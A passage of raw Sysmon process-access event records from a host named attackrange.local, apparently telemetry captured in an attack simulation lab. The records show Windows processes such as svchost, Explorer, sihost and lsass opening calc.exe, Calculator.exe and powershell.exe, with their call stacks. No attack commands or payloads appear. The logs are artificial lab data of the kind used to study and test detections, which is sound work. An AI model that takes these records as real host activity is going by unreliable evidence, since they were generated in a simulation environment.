Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360291Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360290Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000360289Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337a-6013-7402-000000001100}62682592C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360288Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360287Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360286Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000360285Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3d710|C:\Windows\system32\twinui.pcshell.dll+11673|C:\Windows\system32\twinui.pcshell.dll+104e1|C:\Windows\system32\twinui.pcshell.dll+70eab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000360284Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.655{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000360283Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360282Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360281Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.639{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360280Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360279Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360278Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360277Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360276Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360275Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360274Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360273Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360272Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360271Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360270Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 